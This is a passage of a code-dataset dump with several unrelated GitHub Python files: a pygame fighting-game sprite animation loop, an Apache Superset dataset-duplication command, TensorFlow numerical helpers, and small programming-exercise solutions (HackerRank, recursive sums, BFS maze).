Akihar_04[4]=(\"aki01r_004.png\")\n Akihar_04[5]=(\"aki01r_005.png\")\n\n Akiha_05 = {} # media punch derecha\n Akiha_05[0]=(\"aki38_000.png\")\n Akiha_05[1]=(\"aki38_001.png\")\n Akiha_05[2]=(\"aki38_002.png\")\n Akiha_05[3]=(\"aki38_003.png\")\n Akiha_05[4]=(\"aki38_004.png\")\n Akiha_05[5]=(\"aki38_005.png\")\n\n Akihar_05 = {} # media punch izquierda\n Akihar_05[0]=(\"aki38r_000.png\")\n Akihar_05[1]=(\"aki38r_001.png\")\n Akihar_05[2]=(\"aki38r_002.png\")\n Akihar_05[3]=(\"aki38r_003.png\")\n Akihar_05[4]=(\"aki38r_004.png\")\n Akihar_05[5]=(\"aki38r_005.png\")\n\n Akiha_06 = {} # high kick derecha \n Akiha_06[0]=(\"aki40_000.png\")\n Akiha_06[1]=(\"aki40_001.png\")\n Akiha_06[2]=(\"aki40_002.png\")\n Akiha_06[3]=(\"aki40_003.png\")\n Akiha_06[4]=(\"aki40_004.png\")\n Akiha_06[5]=(\"aki40_005.png\")\n Akiha_06[6]=(\"aki40_006.png\")\n Akiha_06[7]=(\"aki40_007.png\")\n Akiha_06[8]=(\"aki40_008.png\")\n Akiha_06[9]=(\"aki40_009.png\")\n Akiha_06[10]=(\"aki40_010.png\")\n\n Akihar_06 = {} # high kick izquierda \n Akihar_06[0]=(\"aki40r_000.png\")\n Akihar_06[1]=(\"aki40r_001.png\")\n Akihar_06[2]=(\"aki40r_002.png\")\n Akihar_06[3]=(\"aki40r_003.png\")\n Akihar_06[4]=(\"aki40r_004.png\")\n Akihar_06[5]=(\"aki40r_005.png\")\n Akihar_06[6]=(\"aki40r_006.png\")\n Akihar_06[7]=(\"aki40r_007.png\")\n Akihar_06[8]=(\"aki40r_008.png\")\n Akihar_06[9]=(\"aki40r_009.png\")\n Akihar_06[10]=(\"aki40r_010.png\")\n\n Akiha_07 = {} # animacion saltar arriba derecha\n Akiha_07[0]=(\"aki15_000.png\")\n Akiha_07[1]=(\"aki15_001.png\")\n Akiha_07[2]=(\"aki15_002.png\")\n Akiha_07[3]=(\"aki15_003.png\")\n Akiha_07[4]=(\"aki15_004.png\")\n Akiha_07[5]=(\"aki15_005.png\")\n Akiha_07[6]=(\"aki15_006.png\")\n Akiha_07[7]=(\"aki15_007.png\")\n Akiha_07[8]=(\"aki15_008.png\")\n Akiha_07[9]=(\"aki15_009.png\")\n Akiha_07[10]=(\"aki15_010.png\")\n Akiha_07[11]=(\"aki15_011.png\")\n Akiha_07[12]=(\"aki15_012.png\")\n Akiha_07[13]=(\"aki15_013.png\")\n Akiha_07[14]=(\"aki15_014.png\")\n Akiha_07[15]=(\"aki15_015.png\")\n Akiha_07[16]=(\"aki15_016.png\")\n Akiha_07[17]=(\"aki15_017.png\")\n Akiha_07[18]=(\"aki15_018.png\")\n Akiha_07[19]=(\"aki15_019.png\")\n Akiha_07[20]=(\"aki15_020.png\")\n Akiha_07[21]=(\"aki15_021.png\")\n Akiha_07[22]=(\"aki15_022.png\")\n Akiha_07[23]=(\"aki15_023.png\")\n\n Akihar_07 = {} # animacion saltar arriba izquierda\n Akihar_07[0]=(\"aki15r_000.png\")\n Akihar_07[1]=(\"aki15r_001.png\")\n Akihar_07[2]=(\"aki15r_002.png\")\n Akihar_07[3]=(\"aki15r_003.png\")\n Akihar_07[4]=(\"aki15r_004.png\")\n Akihar_07[5]=(\"aki15r_005.png\")\n Akihar_07[6]=(\"aki15r_006.png\")\n Akihar_07[7]=(\"aki15r_007.png\")\n Akihar_07[8]=(\"aki15r_008.png\")\n Akihar_07[9]=(\"aki15r_009.png\")\n Akihar_07[10]=(\"aki15r_010.png\")\n Akihar_07[11]=(\"aki15r_011.png\")\n Akihar_07[12]=(\"aki15r_012.png\")\n Akihar_07[13]=(\"aki15r_013.png\")\n Akihar_07[14]=(\"aki15r_014.png\")\n Akihar_07[15]=(\"aki15r_015.png\")\n Akihar_07[16]=(\"aki15r_016.png\")\n Akihar_07[17]=(\"aki15r_017.png\")\n Akihar_07[18]=(\"aki15r_018.png\")\n Akihar_07[19]=(\"aki15r_019.png\")\n Akihar_07[20]=(\"aki15r_020.png\")\n Akihar_07[21]=(\"aki15r_021.png\")\n Akihar_07[22]=(\"aki15r_022.png\")\n Akihar_07[23]=(\"aki15r_023.png\")\n\n Akiha_08 = {} # animacion burla derecha\n Akiha_08[0]=(\"aki93_000.png\")\n Akiha_08[1]=(\"aki93_001.png\")\n Akiha_08[2]=(\"aki93_002.png\")\n Akiha_08[3]=(\"aki93_003.png\")\n Akiha_08[4]=(\"aki93_004.png\")\n Akiha_08[5]=(\"aki93_005.png\")\n Akiha_08[6]=(\"aki93_006.png\")\n Akiha_08[7]=(\"aki93_007.png\")\n Akiha_08[8]=(\"aki93_008.png\")\n Akiha_08[9]=(\"aki93_009.png\")\n Akiha_08[10]=(\"aki93_010.png\")\n Akiha_08[11]=(\"aki93_011.png\")\n Akiha_08[12]=(\"aki93_012.png\")\n Akiha_08[13]=(\"aki93_013.png\")\n\n Akihar_08 = {} # animacion burla derecha\n Akihar_08[0]=(\"aki93r_000.png\")\n Akihar_08[1]=(\"aki93r_001.png\")\n Akihar_08[2]=(\"aki93r_002.png\")\n Akihar_08[3]=(\"aki93r_003.png\")\n Akihar_08[4]=(\"aki93r_004.png\")\n Akihar_08[5]=(\"aki93r_005.png\")\n Akihar_08[6]=(\"aki93r_006.png\")\n Akihar_08[7]=(\"aki93r_007.png\")\n Akihar_08[8]=(\"aki93r_008.png\")\n Akihar_08[9]=(\"aki93r_009.png\")\n Akihar_08[10]=(\"aki93r_010.png\")\n Akihar_08[11]=(\"aki93r_011.png\")\n Akihar_08[12]=(\"aki93r_012.png\")\n Akihar_08[13]=(\"aki93r_013.png\")\n\n while True:\n \n for event in pygame.event.get():\n if event.type == KEYDOWN:\n if pygame.key.get_pressed()[K_RIGHT]:\n estado = 1\n pos = 0\n if pygame.key.get_pressed()[K_UP]:\n u = 0\n estado = 9 # salto hacia derecha\n \n elif pygame.key.get_pressed()[K_LEFT]:\n estado = 2\n pos = 1\n if pygame.key.get_pressed()[K_UP]:\n u = 0\n estado = 9 # salto hacia izquierda\n\n elif pygame.key.get_pressed()[K_DOWN]:\n estado = 3 # agacharse\n if pygame.key.get_pressed()[K_a]: #golpe bajo\n u = 0\n estado = 11\n \n elif pygame.key.get_pressed()[K_UP]:\n u = 0\n estado = 5 # saltar hacia arriba\n \n elif pygame.key.get_pressed()[K_a]:\n u = 0\n estado = 6 # light punch\n\n elif pygame.key.get_pressed()[K_s]:\n u = 0\n estado = 7 # media punch \n\n elif pygame.key.get_pressed()[K_d]:\n u = 0\n estado = 8 # high kick\n\n elif pygame.key.get_pressed()[K_g]:\n u = 0\n estado = 10 # burla\n\n \n if pygame.key.get_pressed()[K_ESCAPE]:\n pygame.quit()\n sys.exit()\n\n \n elif event.type == KEYUP:\n if estado == 3:\n v = 0\n estado = 4 # levantarse\n else:\n v = 0\n estado = 0\n \n \n \n \n if estado == 0 and pos == 0: # stand by derecha\n u = 0\n if v <= 11:\n akiha = pygame.image.load(Akiha_00[v]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n pygame.time.wait(time)\n v += 1\n if v > 11:\n v = 0\n\n if estado == 0 and pos == 1: # stand by izquierda\n u = 0\n if v <= 11:\n akiha = pygame.image.load(Akihar_00[v]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n pygame.time.wait(time)\n v += 1\n if v > 11:\n v = 0\n \n elif estado == 1: # caminar derecha\n u = 0\n akiha = pygame.image.load(Akiha_01[v]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n pygame.time.wait(time_2)\n x += i\n v += 1\n if v > 13:\n v = 1\n \n elif estado == 2: # caminar izquierda\n u = 0\n akiha = pygame.image.load(Akihar_01[v]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n pygame.time.wait(time_2)\n x -= i\n v += 1\n if v > 13:\n v = 1\n\n elif estado == 3 and pos == 0: # agacharse a la derecha\n if u < 5:\n akiha = pygame.image.load(Akiha_02[u]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n pygame.time.wait(time_3)\n u += 1\n\n if u == 5:\n akiha = pygame.image.load(Akiha_02[u]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n \n \n\n \n elif estado == 3 and pos == 1: # agacharse a la izquierda\n if u < 5:\n akiha = pygame.image.load(Akihar_02[u]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n pygame.time.wait(time_3)\n u += 1\n \n\n if u == 5:\n akiha = pygame.image.load(Akihar_02[u]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n \n \n \n\n\n elif estado == 4 and pos == 0: # levantarse a la derecha\n if u < 14:\n akiha = pygame.image.load(Akiha_02[u]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n pygame.time.wait(time_3)\n u += 1\n else:\n estado = 0\n \n\n elif estado == 4 and pos == 1: # levantarse a la izquierda\n if u < 14:\n akiha = pygame.image.load(Akihar_02[u]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n pygame.time.wait(time_3)\n u += 1\n else:\n estado = 0\n\n elif estado == 5 and pos == 0: # arriba a la derecha\n while u < 27:\n if u <= 4:\n akiha = pygame.image.load(Akiha_03[u]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n pygame.time.wait(time_3)\n u += 1\n \n else:\n if u <= 11:\n akiha = pygame.image.load(Akiha_03[u]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n pygame.time.wait(time_3)\n u += 1\n y -= 15\n else:\n if u <= 18:\n akiha = pygame.image.load(Akiha_03[u]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n pygame.time.wait(time_3)\n u += 1\n y += 15\n else:\n if u <27:\n akiha = pygame.image.load(Akiha_03[u]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n pygame.time.wait(time_3)\n u += 1\n \n \n else:\n estado = 0\n\n elif estado == 5 and pos == 1: # arriba a la izquierda\n while u < 27:\n if u <= 4:\n akiha = pygame.image.load(Akihar_03[u]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n pygame.time.wait(time_3)\n u += 1\n \n else:\n if u <= 11:\n akiha = pygame.image.load(Akihar_03[u]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n pygame.time.wait(time_3)\n u += 1\n y -= 15\n else:\n if u <= 18:\n akiha = pygame.image.load(Akihar_03[u]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n pygame.time.wait(time_3)\n u += 1\n y += 15\n else:\n if u <27:\n akiha = pygame.image.load(Akihar_03[u]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n pygame.time.wait(time_3)\n u += 1\n else:\n estado = 0\n \n elif estado == 6 and pos == 0: # light punch derecha \n while u < 5:\n if u < 5:\n akiha = pygame.image.load(Akiha_04[u]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n pygame.time.wait(time_3)\n u += 1\n else:\n estado = 0\n\n elif estado == 6 and pos == 1: # light punch izquierda \n while u < 5:\n if u < 5:\n akiha = pygame.image.load(Akihar_04[u]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n pygame.time.wait(time_3)\n u += 1\n else:\n estado = 0\n elif estado == 7 and pos == 0: # media punch derecha \n while u < 5:\n if u < 5:\n akiha = pygame.image.load(Akiha_05[u]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n pygame.time.wait(time_3)\n u += 1\n else:\n estado = 0\n\n elif estado == 7 and pos == 1: # media punch izquierda \n while u < 5:\n if u < 5:\n akiha = pygame.image.load(Akihar_05[u]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n pygame.time.wait(time_3)\n u += 1\n else:\n estado = 0\n\n\n elif estado == 8 and pos == 0: # high kick derecha \n while u < 10:\n if u < 10:\n akiha = pygame.image.load(Akiha_06[u]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n pygame.time.wait(time_3)\n u += 1\n else:\n estado = 0\n\n elif estado == 8 and pos == 1: # high kick izquierda \n while u < 10:\n if u < 10:\n akiha = pygame.image.load(Akihar_06[u]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n pygame.time.wait(time_3)\n u += 1\n else:\n estado = 0\n\n elif estado == 9 and pos == 0: # salto hacia la derecha \n while u < 23:\n if u < 3:\n akiha = pygame.image.load(Akiha_07[u]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n pygame.time.wait(time_3)\n u += 1\n else:\n if u < 7:\n akiha = pygame.image.load(Akiha_07[u]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n pygame.time.wait(time_3)\n u += 1\n x += 15\n y -= 20\n else:\n if u < 13:\n akiha = pygame.image.load(Akiha_07[u]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n pygame.time.wait(time_3)\n u += 1\n x += 25\n else:\n if u < 17:\n akiha = pygame.image.load(Akiha_07[u]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n pygame.time.wait(time_3)\n u += 1\n x += 15\n y += 20\n else:\n if u < 23:\n akiha = pygame.image.load(Akiha_07[u]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n pygame.time.wait(time_3)\n u += 1\n \n else:\n estado = 0 \n\n\n elif estado == 9 and pos == 1: # salto hacia la izquierda \n while u < 23:\n if u < 3:\n akiha = pygame.image.load(Akihar_07[u]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n pygame.time.wait(time_3)\n u += 1\n else:\n if u < 7:\n akiha = pygame.image.load(Akihar_07[u]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n pygame.time.wait(time_3)\n u += 1\n x -= 15\n y -= 20\n else:\n if u < 13:\n akiha = pygame.image.load(Akihar_07[u]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n pygame.time.wait(time_3)\n u += 1\n x -= 25\n else:\n if u < 17:\n akiha = pygame.image.load(Akihar_07[u]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n pygame.time.wait(time_3)\n u += 1\n x -= 15\n y += 20\n else:\n if u < 23:\n akiha = pygame.image.load(Akihar_07[u]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n pygame.time.wait(time_3)\n u += 1\n \n else:\n estado = 0\n \n elif estado == 10 and pos == 0: # Burla \n while u < 13:\n if u < 13:\n akiha = pygame.image.load(Akiha_08[u]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n pygame.time.wait(time_3)\n u += 1\n else:\n pygame.time.wait(250)\n estado = 0\n\n elif estado == 10 and pos == 1: # Burla \n while u < 13:\n if u < 13:\n akiha = pygame.image.load(Akihar_08[u]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n pygame.time.wait(time_3)\n u += 1\n else:\n pygame.time.wait(250)\n estado = 0\n\n \n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n \nif __name__== \"__main__\":\n main()\n \n \n","repo_name":"Mamorut/Melty_Blood_Arcade_Test","sub_path":"Melty_Blood_Test/Melty_Blood_Prueba_Terminada.py","file_name":"Melty_Blood_Prueba_Terminada.py","file_ext":"py","file_size_in_byte":28493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25165836605","text":"import logging\nfrom typing import Any\n\nfrom flask_appbuilder.models.sqla import Model\nfrom flask_babel import gettext as __\nfrom marshmallow import ValidationError\nfrom sqlalchemy.exc import SQLAlchemyError\n\nfrom superset.commands.base import BaseCommand, CreateMixin\nfrom superset.commands.dataset.exceptions import (\n DatasetDuplicateFailedError,\n DatasetExistsValidationError,\n DatasetInvalidError,\n DatasetNotFoundError,\n)\nfrom superset.commands.exceptions import DatasourceTypeInvalidError\nfrom superset.connectors.sqla.models import SqlaTable, SqlMetric, TableColumn\nfrom superset.daos.dataset import DatasetDAO\nfrom superset.daos.exceptions import DAOCreateFailedError\nfrom superset.errors import ErrorLevel, SupersetError, SupersetErrorType\nfrom superset.exceptions import SupersetErrorException\nfrom superset.extensions import db\nfrom superset.models.core import Database\nfrom superset.sql_parse import ParsedQuery\n\nlogger = logging.getLogger(__name__)\n\n\nclass DuplicateDatasetCommand(CreateMixin, BaseCommand):\n def __init__(self, data: dict[str, Any]) -> None:\n self._base_model: SqlaTable = SqlaTable()\n self._properties = data.copy()\n\n def run(self) -> Model:\n self.validate()\n try:\n database_id = self._base_model.database_id\n table_name = self._properties[\"table_name\"]\n owners = self._properties[\"owners\"]\n database = db.session.query(Database).get(database_id)\n if not database:\n raise SupersetErrorException(\n SupersetError(\n message=__(\"The database was not found.\"),\n error_type=SupersetErrorType.DATABASE_NOT_FOUND_ERROR,\n level=ErrorLevel.ERROR,\n ),\n status=404,\n )\n table = SqlaTable(table_name=table_name, owners=owners)\n table.database = database\n table.schema = self._base_model.schema\n table.template_params = self._base_model.template_params\n table.normalize_columns = self._base_model.normalize_columns\n table.always_filter_main_dttm = self._base_model.always_filter_main_dttm\n table.is_sqllab_view = True\n table.sql = ParsedQuery(self._base_model.sql).stripped()\n db.session.add(table)\n cols = []\n for config_ in self._base_model.columns:\n column_name = config_.column_name\n col = TableColumn(\n column_name=column_name,\n verbose_name=config_.verbose_name,\n expression=config_.expression,\n filterable=True,\n groupby=True,\n is_dttm=config_.is_dttm,\n type=config_.type,\n description=config_.description,\n )\n cols.append(col)\n table.columns = cols\n mets = []\n for config_ in self._base_model.metrics:\n metric_name = config_.metric_name\n met = SqlMetric(\n metric_name=metric_name,\n verbose_name=config_.verbose_name,\n expression=config_.expression,\n metric_type=config_.metric_type,\n description=config_.description,\n )\n mets.append(met)\n table.metrics = mets\n db.session.commit()\n except (SQLAlchemyError, DAOCreateFailedError) as ex:\n logger.warning(ex, exc_info=True)\n db.session.rollback()\n raise DatasetDuplicateFailedError() from ex\n return table\n\n def validate(self) -> None:\n exceptions: list[ValidationError] = []\n base_model_id = self._properties[\"base_model_id\"]\n duplicate_name = self._properties[\"table_name\"]\n\n base_model = DatasetDAO.find_by_id(base_model_id)\n if not base_model:\n exceptions.append(DatasetNotFoundError())\n else:\n self._base_model = base_model\n\n if self._base_model and self._base_model.kind != \"virtual\":\n exceptions.append(DatasourceTypeInvalidError())\n\n if DatasetDAO.find_one_or_none(table_name=duplicate_name):\n exceptions.append(DatasetExistsValidationError(table_name=duplicate_name))\n\n try:\n owners = self.populate_owners()\n self._properties[\"owners\"] = owners\n except ValidationError as ex:\n exceptions.append(ex)\n\n if exceptions:\n raise DatasetInvalidError(exceptions=exceptions)\n","repo_name":"apache/superset","sub_path":"superset/commands/dataset/duplicate.py","file_name":"duplicate.py","file_ext":"py","file_size_in_byte":4662,"program_lang":"python","lang":"en","doc_type":"code","stars":55269,"dataset":"github-code","pt":"61"} +{"seq_id":"42620463749","text":"import sys\n\ndef solve(n, p):\n # Complete this function\n count=0\n a=1\n count1=0\n for i in range(1,n+1):\n if(a==i):\n \n if(i==p):\n count=0\n break\n if(i%2==0):\n count=count+1;\n if(i+1==p or i==p):\n break\n for j in range(n,n>0,-1):\n #print(j)\n if(n==p):\n count1=0\n if(n%2==0):\n \n if(j%2!=0):\n count1=count1+1\n if(j==p or j-1==p):\n break\n if(n%2!=0):\n if(j%2==0):\n \n count1=count1+1;\n if(j-1==p or j==p):\n \n break\n \n #print(count,count1)\n if(count1==count):\n return count\n if(count1>count):\n return count\n else:\n return count1\n \n \n \n\nn = int(input().strip())\np = int(input().strip())\nresult = solve(n, p)\nprint(result)\n","repo_name":"bhaskarkalahasthi/pythonprograms","sub_path":"Drawing Book alogrithm in hacker rank.py","file_name":"Drawing Book alogrithm in hacker rank.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43361085303","text":"import tensorflow as tf\nimport numpy as np\nfrom . import sparsematrix\n\n\nimport logging\nlogger = logging.getLogger(__name__)\n\n\ndef safe_inverse_one(Lambda,numstab):\n return safe_inverse(Lambda[None],numstab)[0]\n\ndef symmetrize(Lambda):\n return .5*(Lambda+batch_transpose(Lambda))\n\ndef batch_transpose(Lambda):\n return tf.einsum('...ji->...ij',Lambda)\n\n@tf.function(autograph=False)\ndef clip_low_eigenvalues(Lambda,numstab):\n with tf.device('cpu'): # GPU eigenvalue stuff stills seem to be quite slow\n eigval,eigvec=tf.linalg.eigh(Lambda)\n eigval=tf.clip_by_value(eigval,numstab,float(np.inf))\n rez=tf.einsum('...jk,...lk,...k->...jl',eigvec,eigvec,eigval)\n rez = symmetrize(rez)\n return rez\n\n@tf.function(autograph=False)\ndef safe_inverse(Lambda,numstab):\n with tf.device('cpu'): # GPU eigenvalues still seem to be quite bad\n eigval,eigvec=tf.linalg.eigh(Lambda)\n eigval=tf.clip_by_value(eigval,numstab,float(np.inf))\n evalo = tf.linalg.diag(1.0/eigval)\n B = tf.einsum('ijk,ilk->ijl',evalo,eigvec)\n return tf.einsum('ijk,ikl->ijl',eigvec,B)\n\ndef tfify(vals,dtype=tf.float64):\n return {x:tf.convert_to_tensor(vals[x],dtype=dtype) for x in vals if (vals[x] is not None)}\n\ndef tf_variabilify(vals,dtype=tf.float64):\n return {x:tf.Variable(tf.convert_to_tensor(vals[x],dtype=dtype)) for x in vals if (vals[x] is not None)}\n\ndef tf_variabilify_one(vals,dtype=tf.float64):\n if vals is None:\n return None\n else:\n return tf.Variable(tf.convert_to_tensor(vals,dtype=dtype))\n\ndef pge_safe(x):\n switch=tf.abs(x)<.00001\n\n A=.25-0.020833333333333332*(x**2)\n B=tf.tanh(x/2)/(2*x)\n return tf.where(switch,A,B)\n\ndef batchup(Nr,batchsize):\n bins=np.r_[0:Nr:batchsize,Nr]\n batches=np.c_[bins[:-1],bins[1:]]\n return batches\n\ndef map_accum(fn,Nr,batchsize,rule):\n batches=batchup(Nr,batchsize)\n\n logger.debug(f\"mapcat {fn}: 0/{Nr}\")\n result=fn(batches[0,0],batches[0,1])\n assert isinstance(result,tuple),\"fn should return a tuple of tensors\"\n\n # initialize!\n if len(rule)==1:\n rule = rule * len(result)\n tas=[]\n for i,r in enumerate(result):\n if r is None:\n tas.append(None)\n elif rule[i]=='c':\n ta = tf.TensorArray(dtype=r.dtype,size=batches.shape[0],dynamic_size=False,\n infer_shape=False,element_shape=(None,)+r.shape[1:])\n ta = ta.write(0,r)\n tas.append(ta)\n elif rule[i]=='s':\n tas.append(r)\n else:\n raise Exception(f\"What is {rule[i]}?\")\n\n # the loop!\n for i in range(1,len(batches)):\n logger.debug(f\"mapcat {fn}: {batches[i,0]}/{Nr}\")\n for j,r in enumerate(fn(batches[i][0],batches[i][1])):\n if tas[0] is None:\n pass\n elif rule[j]=='c':\n tas[j]=tas[j].write(i,r)\n elif rule[j]=='s':\n tas[j]=tas[j]+r\n else:\n raise Exception(f\"What is {rule[j]}?\")\n\n # close out!\n rez=[]\n for i,r in enumerate(tas):\n if tas[0] is None:\n rez.append(None)\n elif rule[i]=='c':\n rez.append(r.concat())\n elif rule[i]=='s':\n rez.append(r)\n else:\n raise Exception(f\"What is {rule[j]}?\")\n\n return tuple(rez)\n\ndef map_cat_sparse(fn,Nr,batchsize,index_dtype=tf.int64):\n CURROW=0\n WIDTH=None\n\n def go(st,en):\n nonlocal CURROW,WIDTH\n g=fn(st,en)\n\n # check for consistant widths\n if WIDTH is None:\n WIDTH=g.shape[1]\n else:\n assert WIDTH==g.shape[1]\n\n rows_n_cols = tf.cast(tf.where(g),dtype=index_dtype)\n data=tf.gather_nd(g,rows_n_cols)\n rows=rows_n_cols[:,0]+st\n cols=rows_n_cols[:,1]\n\n return rows,cols,data\n rows,cols,data = map_accum(go,Nr,batchsize,'ccc')\n row_indptr = tf.searchsorted(rows,tf.range(0,Nr+1,dtype=rows.dtype))\n return sparsematrix.CSRMatrix(row_indptr,rows,cols,data,(Nr,WIDTH),rows.shape[0])\n\ndef log2cosho2_safe(x):\n '''\n returns log(2*(cosh(x/2))\n '''\n\n return tf.math.softplus(x) -0.5*x\n\ndef log2cosho2_unsafe(x):\n '''\n returns log(2*(cosh(x/2))\n '''\n\n return tf.math.log(2*tf.cosh(x/2))\n\ndef log_binom(a,b):\n '''\n result = log a! / (b! * (a-b)!)\n = log Gamma(a+1) - log Gamma(b+1) - log Gamma(a-b+1)\n '''\n\n return tf.math.lgamma(a+1) - tf.math.lgamma(b+1) - tf.math.lgamma(a-b+1)\n\n\ndef log_negativebinomial(X,C,theta):\n '''\n log NegativeBinomial(x; p=sigmoid(c), r= theta)\n '''\n\n xpt=X+theta\n binc = tf.reduce_sum(log_binom(xpt-1,X))\n cosh_term = tf.reduce_sum(log2cosho2_safe(C)*xpt)\n xmh_term = .5*tf.reduce_sum(C*(X-theta))\n\n return xmh_term+binc-cosh_term\n\ndef inverse_digamma(X):\n '''\n find y such that digamma(y) = x\n\n Thomas Minka, Estimating a Dirichlet distribution,\n Technical Report 2012, Appendix C.\n\n by way of Baris Kurt\n '''\n\n M= (X>=-2.22)\n Y = tf.where(M,tf.math.exp(X)+.5,-1/(X+0.5772156649015329))\n\n for i in range(7):\n Y = Y - (tf.math.digamma(Y)-X)/tf.math.polygamma(1,Y);\n\n return Y\n","repo_name":"jacksonloper/signedfac","sub_path":"signedfac/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":5182,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"72947372993","text":"def loop1():\n # Sum the odd numbers between 1 and 20\n odd_sum = 0\n for i in range(20):\n if (i % 2) == 1:\n odd_sum += i\n return odd_sum\n\n\ndef loop2():\n # Sum the even numbers between 1 and 20\n i = 0\n even_sum = 0\n while i < 20:\n if (i % 2) == 0:\n even_sum += i\n i += 1\n return even_sum\n\nprint(loop1())\nprint(loop2())\n\n\ndef loop1Rec(num, current, sum = 0):\n \n if current == num:\n return sum\n elif (current % 2 == 1 and current != num):\n sum += current\n return loop1Rec(num, current + 1, sum)\n else: return loop1Rec(num, current + 1, sum)\n\n\nnum = 20\ncurrent = 0\nsum = 0\nprint(loop1Rec(num, current, sum))\n\n\n\ndef loop2Rec(num, current, sum = 0):\n \n if current == num:\n return sum\n elif (current % 2 == 0 and current != num):\n sum += current\n return loop2Rec(num, current + 1, sum)\n else: return loop2Rec(num, current + 1, sum)\n\n\nnum = 20\ncurrent = 0\nsum = 0\nprint(loop2Rec(num, current, sum))\n\n\n\n\n\ndef loop3Rec(num, odd_sum=0, val=0):\n val = val or 1\n if (val == num):\n return odd_sum\n elif (val % 2 == 1):\n odd_sum += val\n val+=1\n return loop3Rec(num, odd_sum, val)\n\nprint(loop3Rec(20))","repo_name":"josh-leebrowne/AFS-210","sub_path":"week2/Project1/project1.py","file_name":"project1.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16417927078","text":"import sys\nfrom queue import Queue\ninput = sys.stdin.readline\n\nheight, width = map(int, input().split())\ngoal_h, goal_w = height - 1, width - 1\n\n_map = []\nfor i in range(height):\n row = list(input().split('\\n')[0])\n row = list(map(int, row))\n _map.append(row)\n\ndx = [0, 0, 1, -1]\ndy = [1, -1, 0, 0]\n\nq = Queue()\nq.put((0, 0))\n_map[0][0] = 1\n\nwhile not q.empty():\n x, y = q.get()\n for i in range(4):\n nx, ny = x + dx[i], y + dy[i]\n \n # 인덱스 범위 초과\n if nx >= height or nx < 0 or ny >= width or ny < 0:\n continue\n \n # 벽\n if _map[nx][ny] == 0:\n continue\n \n # 이미 방문\n if _map[nx][ny] != 1:\n continue\n\n _map[nx][ny] = _map[x][y] + 1\n\n q.put((nx, ny))\n\nprint(_map[goal_h][goal_w])","repo_name":"Sleeeeeepy/jungle-ps","sub_path":"week2/2178.py","file_name":"2178.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} 